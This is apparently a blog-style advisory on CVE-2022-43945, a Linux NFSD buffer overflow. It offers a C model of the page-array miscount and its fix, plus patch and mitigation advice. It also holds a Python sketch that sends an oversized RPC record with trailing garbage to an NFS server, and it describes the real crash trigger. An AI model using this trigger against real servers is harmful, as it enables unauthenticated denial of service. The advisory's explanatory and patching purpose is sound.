On October 28th, 2022, CVE-2022-43945 was assigned to a high-severity buffer overflow vulnerability in the Linux kernel's Network File System daemon (NFSD) in versions prior to 5.19.17 and 6.0.2. A remote client that can reach the NFS server can crash it by sending a single well-formed but slightly oversized RPC message. If you run a vulnerable kernel and export files over NFS, this is a must-read.
What is CVE-2022-43945?
This vulnerability exists in the way the Linux kernel’s NFSD component tracks memory pages for Remote Procedure Call (RPC) messages. NFSD combines the receive and send data buffers into a single array. A special combination of TCP packet and "garbage" data at the message’s end can trick the kernel into a buffer overflow, leading to server crashes or worse.
* CVSS v3.1 score: 7.5 (High); the impact is purely availability, but no privileges or user interaction are needed
* Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1. NFS over TCP: The client sends an NFS request over TCP as normal.
2. Garbage Data at the End: The message carries a correctly formed RPC call followed by extra "garbage" bytes after the end of the call. The TCP record marker counts those bytes as part of the record, so the record is complete and valid at the framing layer.
3. Spot the Error: Because the RPC message is still correctly formed according to the specification, the kernel's RPC layer accepts it and passes it on to the NFS procedure handler.
4. Buffer Miscount: NFSD keeps one page array per thread for both the received request and the reply, so every page swallowed by the garbage is a page the reply no longer has: the send buffer has shrunk. The handler builds its reply assuming the usual send buffer size and writes beyond the space that is actually left, a classic buffer overflow.
5. Server Impact: The kernel panics or behaves unpredictably. In the best case the kernel crashes (denial of service). In the worst case, kernel memory corruption could open further attack vectors, although only the availability impact is credited in the CVSS rating.
The Code Vulnerability (Explained Simply)
The issue is buried in the way NFSD merges the receive and send page arrays for a request. The procedure handlers that build large replies, READ and READDIR in particular, size their output from the client's count and the protocol maximum and never check how much send buffer actually remains once an oversized request has eaten into the shared array. The upstream fixes cap the reply at the space that is genuinely left.
Here's a simplified snippet inspired by upstream kernel sources (not a literal copy):
// Hypothetical vulnerable code (illustrative only, not the kernel's)
struct page *pages[MAX_BUFFER_PAGES];   // one array shared by receive and send
int total_pages = recv_pages + send_pages;
// recv_pages grows with the trailing garbage; what is left for send shrinks
// ... page array allocations and copying ...
if (send_buffer_shrunk) {
    // Nothing compares new_send_len with the send pages that actually remain!
    memcpy(pages + recv_pages, new_send_data, new_send_len);
    // If new_send_len exceeds the remaining space, the write runs past pages[]: BOOM, overflow.
}
A "shrunken" send buffer and a carefully chosen packet let the attacker push the write past the end of pages[] into adjacent memory.
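To make the mechanism concrete, here is an added example in C (my own model, not code from the kernel or from this page): a single page array shared between the received request and the reply, a handler that sizes its reply without regard to how much of that array the request already consumed, and the hardened variant that caps the reply at the space left. The sizes (MODEL_PAGE_SIZE, MODEL_MAX_PAYLOAD, MODEL_TOTAL_PAGES), the function names and the sample request lengths are assumptions for the model, not kernel values.

```c
#include <stdbool.h>
#include <stdio.h>

/*
 * Hypothetical model of an NFSD thread's page array (not kernel code):
 * one fixed array of pages serves both the received request and the
 * reply being built, so every page the request occupies is a page the
 * reply can no longer use. All sizes below are assumptions for the model.
 */
#define MODEL_PAGE_SIZE    4096u
#define MODEL_MAX_PAYLOAD  (64u * 1024u)   /* assumed max READ/READDIR payload */
/* Enough pages for a full-size request plus a full-size reply, plus one
 * page for headers (the kernel's exact count is not modelled). */
#define MODEL_TOTAL_PAGES  ((2u * MODEL_MAX_PAYLOAD) / MODEL_PAGE_SIZE + 1u)

static unsigned pages_for(unsigned bytes)
{
    return (bytes + MODEL_PAGE_SIZE - 1u) / MODEL_PAGE_SIZE;
}

/* Pages consumed by the incoming record, trailing garbage included:
 * the framing layer accepts the whole record, so the garbage counts. */
unsigned recv_pages(unsigned request_len)
{
    return pages_for(request_len);
}

/* Bytes genuinely left for the reply after the request took its pages. */
unsigned send_space(unsigned request_len)
{
    unsigned rp = recv_pages(request_len);
    if (rp >= MODEL_TOTAL_PAGES)
        return 0u;
    return (MODEL_TOTAL_PAGES - rp) * MODEL_PAGE_SIZE;
}

/* Vulnerable handler: sizes the reply from the client's count and the
 * protocol maximum only, never asking how much send buffer remains. */
unsigned reply_len_vulnerable(unsigned request_len, unsigned count)
{
    (void)request_len;   /* the bug: the request's size is ignored here */
    return count > MODEL_MAX_PAYLOAD ? MODEL_MAX_PAYLOAD : count;
}

/* Hardened handler: additionally caps the reply at the space that is
 * actually left, the same idea as bounding the reply by the encoder's
 * remaining buffer instead of by the protocol maximum. */
unsigned reply_len_fixed(unsigned request_len, unsigned count)
{
    unsigned len = reply_len_vulnerable(request_len, count);
    unsigned avail = send_space(request_len);
    return len > avail ? avail : len;
}

/* True when writing reply_len bytes would run past the shared array. */
bool would_overflow(unsigned request_len, unsigned reply_len)
{
    return reply_len > send_space(request_len);
}

int main(void)
{
    /* Constructed inputs: a normal READ request of about 200 bytes, and
     * the same request with 120 KiB of garbage appended after the call. */
    const unsigned normal = 200u;
    const unsigned oversized = 200u + 120u * 1024u;
    const unsigned count = MODEL_MAX_PAYLOAD;   /* client asks for max data */

    printf("normal:    send space %u, vuln reply %u, overflow=%d\n",
           send_space(normal), reply_len_vulnerable(normal, count),
           (int)would_overflow(normal, reply_len_vulnerable(normal, count)));
    printf("oversized: send space %u, vuln reply %u, overflow=%d\n",
           send_space(oversized), reply_len_vulnerable(oversized, count),
           (int)would_overflow(oversized, reply_len_vulnerable(oversized, count)));
    printf("oversized: fixed reply %u, overflow=%d\n",
           reply_len_fixed(oversized, count),
           (int)would_overflow(oversized, reply_len_fixed(oversized, count)));
    return 0;
}
```

Build with `cc -std=c11 -Wall model.c && ./a.out`. The oversized case is the whole story: with 31 of the 33 model pages taken by the request, only 8192 bytes of reply space remain, yet the vulnerable handler still wants to emit 65536 bytes. The hardened handler returns 8192, which is exactly the kind of bound the upstream fixes impose on the READ and READDIR encoders.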
Simple Exploit Example
With a little Python and a network connection, a remote client can send a message of the shape involved.
Disclaimer: Never attack a system you do not own or have explicit permission to test.
import socket
import struct

# NFS port typically 2049
target = "172.16.0.10"
port = 2049

# Placeholder RPC call body (not a well-formed call; truncated for brevity)
rpc_payload = b"\x12\x34\x56\x78" * 8

# Garbage appended after the end of the call
garbage = b"A" * 128
body = rpc_payload + garbage

# RPC-over-TCP record marker: high bit = last fragment, low 31 bits = length.
# The length covers the whole fragment, garbage included, so the record is
# still complete and valid at the framing layer.
record_marker = struct.pack(">I", 0x80000000 | len(body))
payload = record_marker + body

sock = socket.create_connection((target, port))
sock.sendall(payload)
sock.close()
As written, this sketch only exercises the TCP record framing: the RPC body is a placeholder rather than a well-formed call, so the server rejects it long before the vulnerable handler runs. The real trigger is a correctly formed RPC call with garbage appended after the end of the call, which the kernel accepts and passes on to the procedure handler. Against an unpatched server that message can crash the kernel and take every export on the host down with it, and no credentials are required beyond being able to reach the NFS service.
Who is Affected?
* Linux kernels before 5.19.17 and 6.0.2
* Systems that run the kernel NFS server (NFSD) and accept NFS over TCP from clients, whether on the local network or further afield
* Any distribution shipping a vulnerable kernel, e.g., older Fedora, Ubuntu, RHEL, Debian releases
Mainline patch:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=063fa5743171
Debian advisory:
https://security-tracker.debian.org/tracker/CVE-2022-43945
All major distributions have shipped patches. Update the kernel package and reboot into it:
- "linux-image" for Ubuntu/Debian
- "kernel" for RedHat/CentOS/Fedora
If you cannot update yet, limit exposure: restrict which hosts can reach the NFS service (TCP port 2049) to trusted client networks, since the trigger is a message delivered to the server over the network.
Further Reading and References
* CVE-2022-43945 at MITRE
* Linux Kernel Patch (git.kernel.org)
* RedHat CVE page
* Debian Security Tracker
Takeaway
CVE-2022-43945 is a striking example of how subtle mistakes in kernel code — especially network code like NFS — can put entire servers at risk from just one bad packet. If you run Linux fileservers, make patching a habit!
Stay secure, patch your systems, and keep a keen eye on NFS security advisories.
*Written and adapted exclusively for you by OpenAI's language models. If you found this explanation useful, consider sharing to raise awareness amongst system administrators and developers!*
Timeline
Published on: 11/04/2022 19:15:00 UTC
Last modified on: 03/08/2023 18:15:00 UTC